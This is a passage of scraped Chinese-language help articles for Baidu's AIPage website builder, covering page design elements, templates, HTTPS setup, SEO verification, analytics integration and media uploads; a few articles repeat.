小程序列表支持自由列表横向滑动模式 使用方法:打开『百度智能门户AIPage 』小程序计器,找到【自由列表-横向滚动】如下图所示: 05 小程序动态列表允许绑定图集,同时还可以特殊标记 使用方法:打开『百度智能门户AIPage 』小程序设计器,找到【任意组件-数据-绑定动态数据】如下图所示: 06 小程序元素多选添加对齐操作 使用方法:打开『百度智能门户AIPage 』小程序设计器,找到【多选几个元素-对齐方式】如下图所示: 07 富文本添加格式清除 08 参考辅助线优化,可以精简&添加距离 站点后台部分 01 单分类自定义权限支持&文章删除以及复制支持自定义权限 使用方法:打开『百度智能门户AIPage 』后台管理,找到【文章/产品-编辑-设置访问权限】如下图所示: 02 商品支持导出 使用方法:打开『百度智能门户AIPage 』后台管理,找到【商品列表-导出】如下图所示: 03 分类支持设置自定义SEO 使用方法:打开『百度智能门户AIPage 』后台管理,找到【文章/产品-编辑-SEO优化】如下图所示: 04 站点支持无损迁移上线 BUG修复 修复产品参数保存出现重复问题 修复选项卡嵌套隐藏问题 修复表单字段导出 修复SEO收录数量识别 修复小程序文本交互失效 修复信息发布订单支付下单 好了,以上就是本期的产品更新汇总 你学会了吗?   #### aipage空白版块自由元素设计 自由元素设计是网站最常见的操作之一,借助自由设计可以实现更灵活丰富的展示效果。以下介绍常见元素操作的使用: 1 空白版块的添加 使用元素设计前必填添加空白版块到页面中,尽管元素可以添加到内置版块里,但并不推荐这样做。响应式内置版块与绝对定位的自由元素搭配时可能因为屏幕的变动导致元素的位置发生偏移。自由元素都采用绝对定位方式,推荐在单独的空白版块里进行设计操作(空白轮播也可以,仅保留背景图的内置轮播)。 2 元素的边框、背景、圆角、阴影、旋转 常见的元素包括容器、按钮、图片等,样式设置中常见的有边框、圆角、背景等操作,直接设置即可实时看到效果。背景支持渐变背景、图片背景、纯色背景。拖拽旋转按钮即可对元素执行旋转操作(不支持IE等老式浏览器)。 当圆角等于宽度长度的1半的时候,正方形容器就会变成圆形: 阴影样式常用效果之一,通过调整阴影参数能生成不同的效果,可以查看默认阴影示例容器 3 元素层级、复制、多选与对齐 默认后添加的元素层级比现有元素层级高,如果想调整层级,选中元素右键进行层级操作。 元素右键同样可以进行复制操作,直接复制将在当前版块执行复制。复制到剪贴板则可以将剪贴板中的元素添加到其他版块或者是其他页面。 选中单个元素后按住ctrl或者shift键点击其他元素可以执行多选,多选后元素可以进行对齐或者复制等操作,借助对齐能够快速将零散的元素完成对齐设计。 4 元素动画 选中元素可以设置元素入场动画,如果将动画执行次数设置为无限循环,动画触发后将一直循环执行,可以搭配延迟时间和动画执行时间来设计不同的效果。 原文出处 https://aipage.baidu.com/guide-detail/BQak4GrB #### aipage系统列表页模板设计 系统列表页模板是网站动态列表的默认展示效果,包含内置翻页等功能,网站页面中跳转到任何一个分类都会展示其对应的列表展示效果,如图示例: 系统分类列表页模板版块与系统详情版块类似,包含内置版块和自由设计两种: 1 内置系统分类列表版块 进入系统页面 -> 文章/产品分类列表模板,系统文章产品公用内置分类版块,主要结构为两列布局,设置里支持是否开启边栏,样式设置中支持对展示进行微调。新的分类列表版块边栏一般会展示站点所有分类,就的分类列表版块模板一般是展示当前分类的一级分类的对应子类。 2 自由设计系统分类页 如果要自由设计系统分类列表样式,首先需要将版块切换成空白自由设计系统分类版块 拖拽想要的动态列表元素或者自由列表元素到页面中,设置数据绑定为系统分类,选择此分类后实际的分类页面将自动绑定当前分类的列表数据。注意产品元素只能使用在产品分类列表中,自由列表元素则可以使用在任意数据类型中。 拖拽专有元素中的列表翻页元素到动态列表下方,这里与普通版块的设计区别是设计系统分类版块时需要单独拖拽专有的列表翻页元素 这样就完成了系统分类列表的简单功能设计,一般还会需要设计自定义的边栏菜单效果,例如拖拽垂直菜单绑定站点分类。 预览后可以查看自定义设计系统列表的实际效果,结合其他元素的装饰就可以设计更加丰富多样的系统列表页。 3 使用系统分类页 导航菜单或者其他任意页面的点击跳转处选择点击交互 -> 分类列表页,选择对应的分类就可以在点击时自动跳转到对应的列表中。 #### aipage系统详情页模板设计 详情页模板决定了文章、产品、商品、预约等具体展示样式,系统支持自定义详情模板,最多支持每个分类显示对应的独立的样式效果。详情模板包含内置版块和自由设计两种 1 内置详情版块 编辑器左上角页面管理切换页面系统页面 -> 详情模板进入对应的系统详情页,以产品详情模板为例,系统中内置了十几种常见的详情版块效果,可以通过切换设计来快速更换 详情版块支持通过版块设置来对界面数据和样式进行微调,基本上内置版块的风格比较固定,可改造程度低。 2 自由设计详情版块 自由设计模式则允许对详情版块进行高自由度灵活设计,首先将详情版块切换成空白详情自由设计版块(详情版块不允许直接删除,否则系统页面可能因为缺失必要版块而无法正常展示数据)。切换成空白模式后,则可以从左侧拖拽元素自由设计,其中左侧的专有元素表示只能在详情页中工作的详情元素,例如详情标题、详情内容、详情主图等,还包括不同类型的自定义参数展示。 因为详情内容是动态数据,不同的文章产品内容高度不一样,实际预览时自由模式设计的详情页内容高度将自动撑开,详情内容下方的元素将自动下移。 如何设计带分隔线条的详情效果呢?正常线条应该跟随内容高度自动变化。这种情况下只需要将详情内容放入一个带边框的容器里即可,详情内容的增高将自动撑开外围容器,容器的边框就形成了自动高度的分隔线效果。 详情页也可以自由定制边栏效果,例如添加垂直菜单元素绑定系统分类就可以在详情页添加带站点分类的边栏 详情页的动态数据绑定是支持跨版块的,即便是在多个版块里依旧可以自动绑定对应的数据,因此可以搭配生成更多的效果,例如详情弹框里的元素同样可以拖拽详情标题等元素进去,这样点击打开弹框的时候可以看到动态的内容。 部分内置详情版块支持锚点菜单导航效果,如果是自由设计模式,添加菜单到想要的位置,然后在菜单的点击交互里设置锚点滚动到相应的元素或者版块即可。 #### aipage网站HTTPS证书的配置 域名配置HTTPS证书后浏览器将出现安全提示,否则会提示不安全,当然HTTP并不意味着您的网站就会被黑客攻击篡改,百度智能建站提供了等保三级以上安全防护,平台网站发布页面从未出现被黑客攻击篡改的情况。但是HTTPS是互联网发展趋势,大部分知名网站已开启HTTPS支持,如果您预算足够,推荐购买相应的付费证书来开启网站HTTPS。 1 购买并下载证书 在各大知名证书服务平台购买SSL证书(推荐购买百度证书 https://cloud.baidu.com/product/ssl.html,自带CDN加速支持 ),购买完成后按照官方文档完成证书签发操作 https://cloud.baidu.com/doc/CAS/s/Kkixyck7b, 签发完成后参考此文档下载NGINX版本证书类型https://cloud.baidu.com/doc/CAS/s/ikbkfns3k,下载完成的解压缩包里将有如下证书文件: 证书文件(以.cer或crt为后缀或文件类型)密钥文件(以.key为后缀或文件类型)证书链文件(以_ca.cer或_ca.crt为后缀或文件类型) 2 上传证书 进入站点后台 -> 我的网站 -> HTTPS配置,上传证书文件,需要同时上传证书文件和密钥文件,上传成功则表示文件校验成功 3 开启HTTPS 点击开启HTTPS证书,如果提示正常1分钟所有线上则可以通过https访问,如果访问成功代表证书部署成功,推荐开启HTTPS强制跳转,将HTTP访问的url强制301跳转到HTTPS地址,这样所有的访问都会提示安全表示并且通过HTTPS传输加密。 如果线上HTTPS访问成功但证书列表检测提示https未部署,可能是中文域名导致检测失败,可以在域名列表处添加中文域名对应的punycode域名(复制浏览器地址中文域名即可从中获取到punycode地址,需要去除https协议和路径信息)。不过这里的检测不影响线上HTTPS,因此是否操作此步骤都不影响站点的实际使用。 3 百度证书CDN配置 百度ssl证书自带cdn支持,能帮助站点整体提速,如果准备使用cdn加速功能,https的配置方式有所区别。首先确保站点域名已在站点平台绑定并上线,然后按照百度ssl证书文档进行接入(一般是将www域名解析修改成证书要求的地址),在智能门户建站后台无需上传https配置,如果已上传请点击取消https跳转并删除证书。 站点对外域名解析切换到cdn后,需要添加一个回源域名供cdn抓取。在域名管理处添加类似cdn.abc.com(修改成自己的二级域名地址)的二级域名,同时对二级域名进行解析并发布上线,保证cdn.abc.com打开能正常显示网站界面,然后将cdn.abc.com作为回源域名填写到证书cdn回源域名配置。 注意:经过www域名等解析切换到了证书,平台后台域名管理的www域名不要删除,否则可能影响表单提交等操作 #### aipage网站元素及版块复用方法 网站元素和版块的复用能加快站点设计,常见复用方式如下: 1 页面复用头尾版块 站点自带全局头尾版块,设计的全局头尾将自动套用到整站所有开启全局头尾的页面中,开启方式是在页面设置->页面布局里开启 判断是否编辑全局头尾可以检查页面设置,也可以编辑版块的时候查看是否有黄色边框和提示。 全局尾部的操作类似,这样就可以在任意页面复用全局头尾啦。不过要注意移动端网站的全局头尾是独立设计的,一般移动端风格也差异较大,注意区分哦~ 2 跨页面复用版块 有些版块在不同页面中展示是一样的,另外编辑的时候希望一处编辑任意引用的页面都生效,这种需要借助全局版块来实现。普通版块可以点击工具栏全局版块按钮转成全局版块,添加后此版块将自动添加到内置版块->全局版块分类中,然后可以拖拽到任意其他页面使用。添加到其他页面后,如果想解除与全局版块的关联,只需要点击转成普通版块即可。 3 元素快速复制 元素当前版块可以通过快捷键ctrl + c快速复制,如果是要复制到其他版块或者其他页面甚至是其他终端(例如桌面版元素复制到移动端),则需要通过复制到剪贴板的方式。选中需要复制的元素,点击右键复制到剪贴板,元素就会复制到临时剪贴板区 剪贴板中的元素就可以像普通元素一样拖拽到其他版块或者其他页面任意位置。 #### aipage网站全局通用头尾设计 全局头尾是网站最常见的功能之一,可以控制网站页面复用同个全局头尾模板。每个页面也可以单独控制是否使用全局头部或者全局尾部,判断页面是否开启全局头尾的设置在编辑器左侧页面设置 -> 页面布局里,也可以通过选中版块查看是否有全局头部或者全局尾部的提示。 如果一个新的页面没有显示全局头部或者尾部,首先应该去检查全局头尾是否已打开,另外需要查看是否已编辑全局头尾。如果使用空白头部或者空白尾部编辑,需要注意元素是否在全局头尾里,可以通过左侧页面视图检查元素是否属于对应的版块,例如如果您是从其他自由版块挪动元素到顶部位置,那么其他页面全局头部将不会显示对应的元素。 部分页面可能需要关闭全局头部,例如企业官网首页可能会有轮播版块,为了更好的效果可能需要将导航浮动到轮播上面,但是其他页面没有轮播如果也设置浮动展示效果会冲突。这时候就需要将首页的全局版块转成普通版块了,转成普通版块后头部会变成默认的蓝色边框,说明已经脱离了全局,另外需要关闭一下当前页面的全局头部。 现在就可以针对首页的头部进行自定义设置了,例如为了实现浮动效果,版块设置里将导航模式设置成浮动(也可以选择其他模式) 设置浮动后为了更好的效果,可能需要把菜单颜色设置更醒目的颜色,另外也可以更换一个颜色更搭配的logo。简单设置首页的轮播导航自定义浮动效果就做好啦,如果想要设置首页导航始终固定在浏览器顶部,则选择浮动且固定模式。 导航设置浮动后可能选中不方便,可以在页面视图中点击对应版块然后打开设置栏。 全局尾部的编辑与全局头部的编辑一样,每个页面可以单独控制,一般尾部单独自定义的场景不多。另外需要注意的是移动端网页的全局头尾与桌面端网页的全局头尾是不同步的,需要单独设计,移动端展示风格也会简洁很多。 #### aipage网站全局通用头尾设计 全局头尾是网站最常见的功能之一,可以控制网站页面复用同个全局头尾模板。每个页面也可以单独控制是否使用全局头部或者全局尾部,判断页面是否开启全局头尾的设置在编辑器左侧页面设置 -> 页面布局里,也可以通过选中版块查看是否有全局头部或者全局尾部的提示。 如果一个新的页面没有显示全局头部或者尾部,首先应该去检查全局头尾是否已打开,另外需要查看是否已编辑全局头尾。如果使用空白头部或者空白尾部编辑,需要注意元素是否在全局头尾里,可以通过左侧页面视图检查元素是否属于对应的版块,例如如果您是从其他自由版块挪动元素到顶部位置,那么其他页面全局头部将不会显示对应的元素。 部分页面可能需要关闭全局头部,例如企业官网首页可能会有轮播版块,为了更好的效果可能需要将导航浮动到轮播上面,但是其他页面没有轮播如果也设置浮动展示效果会冲突。这时候就需要将首页的全局版块转成普通版块了,转成普通版块后头部会变成默认的蓝色边框,说明已经脱离了全局,另外需要关闭一下当前页面的全局头部。 现在就可以针对首页的头部进行自定义设置了,例如为了实现浮动效果,版块设置里将导航模式设置成浮动(也可以选择其他模式) 设置浮动后为了更好的效果,可能需要把菜单颜色设置更醒目的颜色,另外也可以更换一个颜色更搭配的logo。简单设置首页的轮播导航自定义浮动效果就做好啦,如果想要设置首页导航始终固定在浏览器顶部,则选择浮动且固定模式。 导航设置浮动后可能选中不方便,可以在页面视图中点击对应版块然后打开设置栏。 全局尾部的编辑与全局头部的编辑一样,每个页面可以单独控制,一般尾部单独自定义的场景不多。另外需要注意的是移动端网页的全局头尾与桌面端网页的全局头尾是不同步的,需要单独设计,移动端展示风格也会简洁很多。 #### aipage网站动态列表数据绑定方式 网站有多种动态数据绑定方式,方便页面展示指定的后台数据 1 分类绑定 分类绑定是最常用的数据绑定方式,对后台动态数据进行合理的分类及层级划分,绑定数据的时候选择对应的分类即可,支持绑定多个分类。 注意:如果分类绑定面板没有显示分类名称只显示一串数字,则代表对应的分类不存在或已删除,需要删除进行重新绑定操作(例如站点更换模板后基本都需要执行重新分类绑定操作)。 分类绑定后可以设置基本的显示字段控制与排序信息,另外还有是否使用后台排序(默认后台自定义排序具备高优先级)。 2 选择指定 选择指定方式比较简单,即当前列表指定展示哪几篇文章或产品等。点击按钮打开详情选择框,结合搜索选择对应的文章产品即可,选择指定同样遵守设置的排序规则。 3 关键词聚合 关键词聚合表示后台数据中标题、副标题、简介中包含此关键词的内容将被聚合选中展示在列表中,关键词聚合可能影响站点导出速度,如果内容较多,建议选择其他聚合方式。 4 标签聚合 标签聚合与关键词聚合类似,将自动聚合后台数据包含指定标签的动态列表。注意:标签列表有10分钟缓存,如果刚添加的标签请稍候再来设置聚合绑定设置。 5 参数聚合 参数聚合与标签聚合类似,聚合对象是参数中包含此参数值的动态列表。 注意每种绑定方式都有每页展示个数设置,开启分页后,如果页数大于1页,列表下方将展示翻页按钮。 #### aipage网站动态数据参数的使用 后台文章产品及商品均支持参数管理,使用参数管理可以提升后台参数信息数据录入效率,方便前端页面展示,同时可以实现复杂的参数筛选支持 1 管理参数 进入管理后台,在内容管理 -> 文章/产品管理或者电商管理 -> 商品列表右上角点击参数管理按钮进入参数管理,参数是动态数据的扩展信息,参数支持多种类型,例如常用的支持筛选的单选、多选文本,以及普通信息展示的文本类型,另外还有方便嵌入网页的url类型以及展示图片列表的图集类型等。设置好参数后,文章产品等在编辑时的参数信息里将出现对应的参数编辑。 以常见的单选参数为例,除了参数名称还需要编辑参数对应的参数值,因为单项多选参数支持参数筛选,因此对应的参数值需要可枚举,列表参数筛选的时候将直接使用枚举的参数值作为筛选项。 2 添加参数 选择对应的文章/产品/商品,在编辑时进入设置参数信息面板,对相应的参数进行直接编辑即可,编辑完之后需保存生效。单项多选类型的参数在界面中可以直接选择参数值,普通文本和其他类型的参数则需要进行编辑。 3 参数展示与筛选 部分动态内置版块及自由列表元素均支持参数筛选,例如以产品列表为例,选择支持筛选的版块(可以在版块设置里查看是否有筛选功能),然后在版块设置中开启筛选-> 选择对应的筛选参数即可完成筛选支持。 如果是自由列表元素,操作方法基本类似。除了参数的筛选,参数也可以作为展示元素嵌入到列表中,列表项拖入自由列表的参数元素并且绑定对应的参数同时设置样式,预览后查看最终效果。 另外对于商品,系统分类列表页支持了内置的筛选效果,进入系统页面 -> 商品分类列表页,内置版块切换成"商品分类及参数筛选版块",所有的商品分类列表页则默认自带了参数筛选效果。 4 详情页参数辅助设计 除了列表类型的参数,参数同样可以在详情页里展示。部分系统产品详情版块内置了带参数的展示效果,如图所示: 另外在使用自由设计详情模式时,同样可以拖拽参数元素到版块位置中并进行自定义设置,例如单个的文本参数展示或者多个参数的参数列表展示、嵌入自定义网页(例如房产vr网页)、嵌入产品图集等。使用方式与普通设计基本一致,进入系统页面对应的详情页,拖拽左侧元素专有元素里面参数相关的元素到页面中设计,需要注意的是系统详情页设计需要预览实际的文章产品才能看到最终的效果。 本文版权归百度智能门户所有,转载请注明出处 https://aipage.baidu.com/guide-detail/NDlqVmEN #### aipage网站备案号添加方法 企业网站均建议在百度云完成备案并发布到大陆机房,备案过的网站必须按照工信部要求在页面底部添加备案号,网站如何快速添加备案号呢? 进入站点后台->我的网站-> 基本信息里设置备案号即可整站自动在底部添加备案信息,公安部备案添加类似: 添加保存后预览即可看到每个页面底部都自动添加了备案信息和工信部链接。如果想自定义添加备案号的样式呢?例如想将备案号直接添加到底部版块里,那么只需要拖拽文字元素到底部版块合适位置然后设置链接到工信部即可,如图所示: 需要注意的是自定义添加备案号需要添加到全局尾部里,即黄色边框的尾部版块,如果您的页面没有开启全局尾部,可以在编辑器左侧页面设置 -> 页面布局里查看是否开启全局尾部,只要开启全局尾部的页面都会跟随改动自动添加自定义备案链接。 #### aipage网站多语言设计教程 站点多语言实际相当于多个站点,不同的语言通过页面路径来区分,例如主域名为中文,官网域名是www.abc.com,开启了英文站点,那么访问www.abc.com将访问中文,访问www.abc.com/en将进入英文首页。 注意:多语言的前提是网站套餐属于官网版及以上套餐,如果您的套餐无法使用,请升级套餐后刷新重试。小程序没有多语言支持 1 开启多语言站点 开启前建议完成主语言站点的设计,这样其他语言可以直接复用主语言创建一个独立站点,进入后台 -> 我的网站-> 网站多语言,选择想要开启的语言点击启用就可以复制任意已有的语言版本。复制将复制站点页面设计,复制后进入编辑器左上角可以切换语言版本。 2 设计多语言站点 每个语言的页面设计是独立的,修改页面不会影响其他版本,一般需要将文字人工翻译成对应的语言版本,您也可以选中文字元素使用自动翻译支持(由百度翻译提供,建议人工进行校准)。 一般首页导航需要添加多语言切换菜单,此菜单将自动识别当前站点开启的语言列表并支持进行点击下拉切换。 如果只开启2种多语言或者想自定义设计多语言切换菜单,需要在元素点击交互跳转外链设置里填写多语言发布后的实际路径, 例如站点主语言首页是/,八种语言的根目录分别是: 中文 /zh英语 /en日语/jp韩语 /kor西班牙语 /spa俄语 /ru德语 /de 繁体中文 /cht阿拉伯语 /ara 站点后台文章产品管理多语言也是独立的,切换文章、产品和商品的多语言实现对不同语言版本的后台内容管理。 3发布多语言站点 注意上线将同时上线每个语言版本,建议多语言站点页面制作完毕再进行上线,每个域名都能访问到所有语言,您可以绑定多个域名进行针对性的推广。注意多语言站点的sitemap地址有所不同,主语言路径不变,多语言的sitemap网站地图文件在对应语言目录下,例如英文站点的sitemap地址示例是www.abc.com/en/sitemap.xml。 #### aipage网站导航菜单设计 网站导航分为内置导航和自由设计导航两种模式,常用导航设置如下: 1 内置导航版块的使用 内置导航版块是系统中开发好的响应式内置导航头部,每个版块都已经设计好了较为固定的风格,提供了基本的样式设置对颜色和功能进行调整。内置导航版块能快速设计站点导航,点击头部版块切换设计查看目前已有的导航版块效果。例如通用企业风格导航、商城风格导航、下拉产品风格、logo不同位置风格等,切换任何版块可以快速运用相应效果,并且导航菜单设置能保持不变。 注意需要区分当前版块是否是全局头部,全局头部版块带有黄色边框,如果没有看到导航版块或者全局版块,可以在左侧页面设置  -> 页面布局里开启全局头部,否则使用普通页头版块设计的导航不能自动同步到其他页面使用,除非当前页面要自定义导航效果。 内置导航的菜单编辑可以直接选中菜单进入编辑面板,二三级菜单需要横向拖拽控制层级(部分导航才支持三级菜单,层级太深影响用户体验) 版块设置里除了样式设置,需要注意的是导航类型和导航宽度设置,导航类型里部分导航带了固定效果,可以控制导航在滚动的时候始终固定在顶部,另外还有浮动效果可以让导航浮动显示在轮播图或者banner大图上方,官网首页带大图轮播时这种效果比较常见。 导航宽度设置则是内置版块在展示时的内容区宽度控制,可以自动撑满整个屏幕,或者只显示在页面设置的内容区宽度。 2 自由元素设计定制导航 内置版块数量有限,如果风格不能满足需求,需要使用空白版块结合元素设计自定义导航效果。常用的元素包括元素 -> 系统 -> LOGO控件和元素 -> 菜单里面的元素组件。 与内置版块一样,自由设计菜单通用支持浮动和吸顶模式,在导航设置里切换设置体验不同的效果差异,如果要设置浮动建议设计好之后再切换成浮动效果,否则无法直接点击选中版块需要在左侧页面视图里选中头部版块。 自由设计比较灵活,按照想要的设计效果进行自由设计即可,如果有复杂的下拉菜单显示效果,可以搭配选项卡元素来设计,具体参考选项卡设计教程。 3 底部导航菜单 底部导航一般会带有页面重要的链接,方便用户快速找到相应页面,另外还有友情链接等。底部导航可以直接使用文本来设计,给每个文本添加链接即可。如智能云官网底部导航效果 #### aipage网站弹框组件设计指导 弹框是网站常用功能,可以用来实现营销广告、通知提醒、弹窗广告、悬浮边栏等功能,网站弹框属于容器,添加方法需要先添加弹框容器到页面中,从左侧元素的弹框或者营销->弹框里拖拽弹框容器实例到页面中,弹框示例中有多种弹框类型示例,例如居中弹框、底部弹框、边栏弹框等,以常见的居中弹框为例: 拖拽到页面中后,编辑器将进入弹框编辑模式,选择元素进行修改或者添加更多元素到弹框容器中编辑 编辑完成之后退出弹框编辑模式保存页面预览即可看到页面加载完成后自动打开了弹框,这是弹框的默认设置,也可以修改弹框设置控制弹框是否自动弹出以及打开频率等,另外样式设置里也可以设置弹框位置、阴影、边框等样式。 弹框添加后默认在当前页面启用,可以在左侧页面视图 -> 弹框左侧眼睛图标判断当前页面是否开启此弹框,弹框是可以整站共享的,只需要添加一次其他页面就可以选择开启使用。注意如果在视图里删除弹框,那么整站所有页面该弹框将被删除,需要区分启用与删除的区别。 除了居中弹框,底部弹框也是比较常见的常见,可以拖拽底部悬浮弹框示例到页面中查看效果,使用底部弹框要注意开启允许点击页面其他区域以及取消遮罩背景色,否则会干扰用户正常查看页面内容。另外还有自定义悬浮边栏弹框,主要是用来设计自定义边栏效果,可以查看悬浮边栏相关课程 #### aipage网站悬浮边栏设计教程 网站悬浮边栏是站点很常见的功能,一般会添加客服、反馈、微信公众号等联系方式方便用户便捷操作。网站有两种方式添加悬浮边栏 1 内置悬浮边栏 桌面端网站内置了2种内置边栏效果,在页面设置里开启即可 简约效果可以简单调整图标尺寸与间隔,示例效果如下: 另外还有一种阴影效果主题,编辑悬浮项目替换自己想要的图标后,可以生成如下效果: 如上两种内置效果都支持悬停弹层内容的自定义,可以通过富文本任意编辑里面展示的内容。 2 自定义设计悬浮边栏 自定义悬浮边栏是通过自定义弹框来设计的,弹框属于一种容器,里面的元素以及悬停交互可以任意自定义,弹层设置自定义位置及尺寸即可,需要注意弹框需要去掉背景浮层以及开启允许点击其他区域,否则将干扰页面的正常点击。 弹框设置及样式设置里可以编辑弹框容器位置、基本操作及背景样式等 #### aipage网站悬浮边栏设计教程 网站悬浮边栏是站点很常见的功能,一般会添加客服、反馈、微信公众号等联系方式方便用户便捷操作。网站有两种方式添加悬浮边栏 1 内置悬浮边栏 桌面端网站内置了2种内置边栏效果,在页面设置里开启即可 简约效果可以简单调整图标尺寸与间隔,示例效果如下: 另外还有一种阴影效果主题,编辑悬浮项目替换自己想要的图标后,可以生成如下效果: 如上两种内置效果都支持悬停弹层内容的自定义,可以通过富文本任意编辑里面展示的内容。 2 自定义设计悬浮边栏 自定义悬浮边栏是通过自定义弹框来设计的,弹框属于一种容器,里面的元素以及悬停交互可以任意自定义,弹层设置自定义位置及尺寸即可,需要注意弹框需要去掉背景浮层以及开启允许点击其他区域,否则将干扰页面的正常点击。 弹框设置及样式设置里可以编辑弹框容器位置、基本操作及背景样式等 #### aipage网站接入百度统计&爱番番及第三方客服 百度统计是使用广泛的免费专业站点统计平台之一,可以看到详细的访客及转化信息。爱番番是之前百度商桥升级而来的商业客服工具,如果使用相同的账号,爱番番与百度统计的接入代码是一样的。 1 接入百度统计 进入百度统计官网https://tongji.baidu.com/,登录后进入管理点击添加站点根据提示完成站点的添加,添加成功后在站点列表里点击右侧获取代码,在代码获取页面复制代码然后粘贴到建站后台我的网站 -> 统计&爱番番里。点击开启客服,粘贴代码即可自动获取统计ID,获取成功后保存发布站点即完成统计代码的部署。 发布成功且线上带有统计代码后(可右键查看源码检查)在统计平台进行代码检查,检查成功即完成了百度统计的接入,后面网站所有的访问信息都能在百度统计平台查看到。 2 开启爱番番客服 如果爱番番百度账号跟百度统计账号一致,实际基础代码是一份,不需要额外部署,如果爱番番提示的基础代码不一致,则将代码复制追加到站点后台 -> 我的网站 -> 站点验证 -> 自定义头部里,注意采取追加的方式,不要修改自定义头部里已经存在的内容。注意修改后需要重新发布上线。 基础代码部署好之后就可以在爱番番上进行其他操作,具体参考爱番番平台 https://aifanfan.baidu.com/,如果爱番番部署成功,页面默认会出现爱番番客服图标,可以进行自定义修改,网站元素点击也可以在点击交互-> 打开客服里设置打开爱番番客服。 3 接入第三方客服 如果站点要使用第三方商业客服,接入方式跟自定义爱番番类似,只需要将第三方的接入代码复制到站点验证自定义头部处即可。如果自定义头部里长度超过了限制,可以在网站页面中通过代码元素添加到全局头部版块里。 #### aipage网站百度资源平台站点验证教程 网站上线后为了优化SEO,必须提交给百度等搜索引擎平台,以百度为例,提交地址是百度搜索资源平台 https://ziyuan.baidu.com 1 绑定网站(如已添加可忽略) 在百度搜索资源平台进入用户 -> 站点管理,点击添加网站 如果账户信息不完善,需要完善下账户信息,然后输入网站信息,注意选择对应的http协议,如果您的网站已部署证书泽选择https协议,网站域名填写主要使用的域名,例如绑定了abc.com和www.abc.com两个域名,一般将www域名作为主要域名,abc.com主域名则通过301配置跳转到www域名,在百度资源平台这里则填写www域名作为站点域名。 添加后设置站点属性信息,到最关键的第三步则需要完成对站点域名的校验,校验方式有多种: 文件验证 文件验证方式需要下载校验文件到网站根目录下,站点上传地址我建站后台 -> 我的网站 -> 网站验证,点击上传验证文件即可,上传成功后如果网站已发布则可以通过链接访问,访问地址是站点域名/文件名称。例如http://www.abc.com/baidu_verify_code-6Fq73JAKzL.html,如果文件访问成功,则可以在百度搜索资源平台继续验证操作 HTML标签验证 HTML标签验证需要在网站页面里添加一个meta标签,复制需要添加的html片段到后台 -> 我的网站 -> 网站验证自定义HTML头部中,需要注意如果html头部里已经填写了其他内容,不要直接删除,往后追加内容,不然可能影响已有的功能无法使用,需要了解之前加的html片段的用处(例如第三方客服部署代码)。 需要注意的是HTML标签验证方式因为修改了站点设置,需要重新发布并且等待发布完成后方可验证通过,发布成功后可以查看网站源代码检查是否带有此HTML标签片段。 CNAME域名验证 域名验证是在域名服务商那添加指定的cname解析,例如添加一个给定的二级域名,选择cname解析,cname解析记录值地址是平台要求的ziyuan.baidu.com,域名解析操作也可以查看此文档。cname验证的优势是指需要在域名服务商那操作,但需要了解域名解析的基本操作。 以上任意一种方式都可以完成站点验证,不同搜索引擎的站点验证方式类似,可以选择一种自己熟悉的方式完成验证 2 提交站点地图 绑定站点后最常见的操作是向资源中心提交站点地图sitemap.xml文件,这是一个记录站点所有页面基本信息的xml文件,访问地址是域名/sitemap.xml,展示版及以上套餐站点可以使用。访问这个地址正常可以看到每个页面的访问URL和更新日期,可以看到内容则代表sitemap文件生成正常。 进入百度资源平台搜索服务 -> 普通收录,选择资源提交-> sitemap方式,填写站点的sitemap地址,保存验证通过即完成了sitemap的提交。sitemap提交后搜索引擎将不定期根据sitemap文件对整个站点进行抓取,即便部分页面没有在页面中添加链接也能被抓取到。 3 主动推送与API提交 如果站点套餐是官网版及以上可以使用主动推送与API提交功能,进入站点后台 -> 搜索优化 -> 收录推送,复制资源平台的API推送参数填写到站点API推送设置里,填写完成后可以点击检测配置是否准确按钮,如果提示推送成功,则代表配置准确。另外推荐开启自动推送按钮实现访问实时推送。 完成以上设置之后,搜索引擎的收录推送设置基本设置完毕,平台将根据设置发布时自动推送新增资源给搜索资源中心,页面访问的时候也将实时前端推送,另外平台还提供了内部渠道进行再次推送,如果站点内容高质且稳定更新,收录稳定后可以实现最快2小时极速收录。 其他搜索引擎的配置类似,只要完成了站点绑定,将sitemap网站地图文件提交给对应的搜索资源平台即可。 #### aipage网站自定义动态列表样式教程 网站提供了内置的文章、产品、商品等动态列表版块及元素,可以修改样式设置来进行样式微调,如果内置效果无法满足需求应该怎么办呢?不用急,使用自由列表可以轻松定制个性化的动态列表效果。 自由列表可以使用拖拽来实时调整动态列表的样式,并且可以增加元素来对列表进行装饰。例如设计如下一个文章列表: 首先需要拖拽一个示例自由列表元素到页面中,自由列表默认绑定的是文章,您可以在设置里绑定产品、商品、预约、文件等动态数据 自由列表里的元素例如文章标题、详情等就是用来设计动态数据列表项的,除此之外您也可以添加其他普通元素例如容器、图片、图形、线条等美化列表设计。 自由列表拖入到页面中后有个默认的示例设计,因为需要设计上图的日历样式,因此需要调整列表项的设计。选中自由列表列表项里面的元素,例如需要删除列表主图,复制2个日期元素,然后移动跳转标题和简介的位置等,另外还需要添加一个线条元素到列表项中以完善设计: 为了实现日期效果,需要对两个日期元素进行样式设置,选择对应的日期格式化设置,并且对样式设置中对字体和颜色进行调整: 另外需要在自由列表整体样式和设置中调整行间距和列表项背景色等,稍微调整之后就完成个性化的文章列表设计啦! 默认自由列表是纵向的动态列表,有没有横向轮播模式的列表项呢?只需要在自由列表整体设置中将布局模式设置成轮播即可: 设置成轮播模式后,默认只有一列,您可以先编辑好轮播项元素位置和样式,再将列表设置多列,稍加调整便可以实现类似横向自动轮播自由列表 自由列表还有一些高级功能,例如搭配元素的显示条件来设计更加丰富的列表效果,赶紧试试吧~ #### aipage网站视频、文件素材管理 站点素材管理里除了图片,还可以上传mp4视频、mp3音频、office常用文档、压缩包等,视频主要支持产品介绍等短视频,文件则方便网站用户进行资料下载等操作。 1 视频上传 打开素材管理 (站点后台-> 内容管理  -> 素材管理或者编辑器内素材管理器), 点击上传视频按钮 主要视频格式只支持标准mp4视频编码(H.264/AVC编码),如果视频上传后无法在移动端播放,则说明视频格式不兼容,需要使用软件重新编码,例如windows上格式工厂、mac的HandBrake都可以对视频进行转码和压缩,一般mp4视频都推荐经过转码压缩后再上传,这样不仅可以保证良好的兼容性,而且能大大压缩视频体积,加快视频的加载速度。 目前平台mp4体积限制300M,如果想上传更大的视频,推荐使用百度智能云vod等服务来上传大视频 https://cloud.baidu.com/product/vod.html,上传后获取视频地址填充到网站定义视频地址处即可(注意此方式不支持小程序)。 注意:视频上传后推荐补充视频封面信息,否则小程序中使用此视频的时候可能因为默认封面加载失败而提示视频加载失败,导致审核无法通过。 2 文件上传 